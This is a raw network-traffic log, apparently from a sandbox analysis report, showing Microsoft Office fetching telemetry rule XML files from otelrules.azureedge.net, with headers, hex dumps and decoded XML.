                                                                                                                                                                                                                                            x-azure-ref: 20241114T120228Z-1749fc9bdbdpg69chC1DFWhecg00000002e00000000024y8
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:53 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1369
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                            x-ms-request-id: 7e8866c9-d01e-0082-5907-36e489000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120253Z-1749fc9bdbdjznvchC1DFWx4dc00000002c0000000006d75
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            31192.168.2.44978813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                            x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120228Z-16547b76f7f22sh5hC1DFWyb4w0000000khg000000005zuk
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:52 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1414
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                            x-ms-request-id: 27f8662d-901e-0029-0878-35274a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120252Z-r178fb8d765dbczshC1DFW33an00000002d0000000004c93
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            32192.168.2.44978913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                            x-ms-request-id: 2cc20079-501e-00a0-320a-369d9f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120228Z-r178fb8d7656shmjhC1DFWu5kw00000002f0000000009svf
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:52 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1377
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                            x-ms-request-id: 87019636-c01e-0082-15c7-2caf72000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120252Z-16547b76f7fdtmzhhC1DFW6zhc00000007hg000000003e1w
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            33192.168.2.44979113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                            x-ms-request-id: 0d17d1bf-701e-005c-790c-36bb94000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120228Z-1749fc9bdbd2jxtthC1DFWfk5w00000002fg000000003brs
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:52 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                                                            x-ms-request-id: 1d414214-201e-0003-4d32-2cf85a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120252Z-16547b76f7fljddfhC1DFWeqbs00000000f0000000008056
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:53 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            34192.168.2.44979013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                            x-ms-request-id: b0dd9ec7-701e-0001-4e30-36b110000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120228Z-1749fc9bdbdfj9bwhC1DFWvdqg00000002cg0000000036cq
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:29 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:52 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                                                            x-ms-request-id: 005cfd91-701e-0097-2e09-36b8c1000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120252Z-1749fc9bdbdnkwnnhC1DFWud0400000002b000000000c2w0
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
